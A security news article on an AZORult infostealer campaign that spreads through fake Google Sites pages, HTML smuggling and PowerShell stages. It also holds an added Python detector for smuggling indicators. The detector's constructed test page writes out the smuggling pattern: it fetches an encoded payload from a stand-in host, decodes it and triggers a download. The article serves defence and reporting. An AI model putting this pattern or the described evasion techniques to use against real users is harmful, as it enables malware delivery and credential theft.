New Malware Campaign Uses Fake Google Sites and HTML Smuggling for AZORult Distribution

A recent report from cybersecurity researchers revealed the discovery of a new malware campaign that uses fake Google Sites pages and HTML smuggling to propagate a commercial malware called AZORult. The campaign, not attributed to any specific threat actor or group, is designed to collect sensitive data for sale on underground forums.

According to Netskope Threat Labs researcher Jan Michael Alcantara, the campaign uses an unconventional HTML smuggling technique in which the malicious payload is concealed within a separate JSON file hosted on an external website. The method is a stealthy way of exploiting legitimate HTML5 and JavaScript features to assemble and launch the malware by “smuggling” an encoded malicious payload. This allows the malware to bypass typical security controls, such as email gateways, which only inspect for suspicious attachments.
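As an added defender-side example (not from the Netskope report or the campaign itself), the script below statically triages an HTML page for the combination described above: JavaScript that decodes an encoded blob fetched from an external JSON file and hands it to a browser download primitive. The indicator names, the verdict threshold and the two sample pages are constructed assumptions.

```python
import re
from html.parser import HTMLParser
# Indicator patterns checked against the page's inline JavaScript. Scripts loaded via
# <script src=...> would need to be fetched and triaged the same way.
INDICATORS = {
    "base64_decode": re.compile(r"\batob\s*\("),
    "binary_reassembly": re.compile(r"Uint8Array|charCodeAt"),
    "blob_construction": re.compile(r"new\s+Blob\s*\("),
    "download_trigger": re.compile(r"createObjectURL|msSaveOrOpenBlob|\.download\s*="),
    "external_json_fetch": re.compile(r"fetch\s*\(\s*['\"]https?://[^'\"]+\.json['\"]"),
}
REBUILD = {"base64_decode", "binary_reassembly", "blob_construction"}

class ScriptCollector(HTMLParser):
    """Concatenates the bodies of all inline <script> elements."""
    def __init__(self):
        super().__init__()
        self.in_script, self.chunks = False, []
    def handle_starttag(self, tag, attrs):
        self.in_script = self.in_script or tag == "script"
    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag != "script"
    def handle_data(self, data):
        if self.in_script:
            self.chunks.append(data)

def triage(html):
    """Return (sorted indicator names, verdict). A page is 'suspicious' when it both
    rebuilds binary data client-side and hands the result to a download primitive."""
    p = ScriptCollector()
    p.feed(html)
    code = "\n".join(p.chunks)
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(code))
    suspicious = "download_trigger" in hits and len(REBUILD & set(hits)) >= 2
    return hits, "suspicious" if suspicious else "clean"

# Constructed test pages (not from the campaign): the first only displays JSON data, the
# second follows the reported pattern of decoding a payload from an external JSON file.
BENIGN = """<html><script>
fetch('https://example.invalid/prices.json').then(r => r.json())
  .then(j => { document.getElementById('out').textContent = j.price; });
</script><div id="out"></div></html>"""
SMUGGLING = """<html><script>
fetch('https://example.invalid/data.json').then(r => r.json()).then(j => {
  const bytes = Uint8Array.from(atob(j.d), c => c.charCodeAt(0));
  const a = document.createElement('a');
  a.href = URL.createObjectURL(new Blob([bytes])); a.download = 'file.bin';
});
</script></html>"""
```

A single fetch of JSON is not an indicator on its own; the verdict only flips when decoding, binary reassembly and a download primitive appear together, which keeps ordinary data-driven pages out of the alert queue.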

Once installed, AZORult, also known as PuffStealer and Ruzalto, can steal credentials, cookies, and browsing history from browsers, take screenshots, and extract data from 137 cryptocurrency wallets. The latest attack activity involves the threat actor creating fake Docs pages on Google Sites that use HTML smuggling to deliver the payload.

The threat actor adds a CAPTCHA barrier to make the fake Docs page appear more legitimate. It also provides an additional layer of protection against URL scanners. The downloaded file is a shortcut file (.LNK) that appears to be a bank statement. However, when opened, it executes a series of intermediate batch and PowerShell scripts from a compromised domain.

One of the PowerShell scripts, called “agent3.ps1,” is responsible for fetching the AZORult loader (“service.exe”), which then downloads and executes another PowerShell script (“sd2.ps1”) containing the actual AZORult malware. This fileless infostealer uses reflective code loading to evade detection and an AMSI bypass technique to avoid being detected by host-based anti-malware products, including Defender.

In conclusion, this new AZORult campaign is a highly sophisticated attempt to distribute malware and steal sensitive information. Using HTML smuggling and other techniques, the threat actor can bypass traditional security measures and infect devices. Individuals and organizations must remain vigilant and cautious when opening emails or clicking on links from unknown sources to avoid falling victim to such attacks.

Deitasoft © 2024. All Rights Reserved.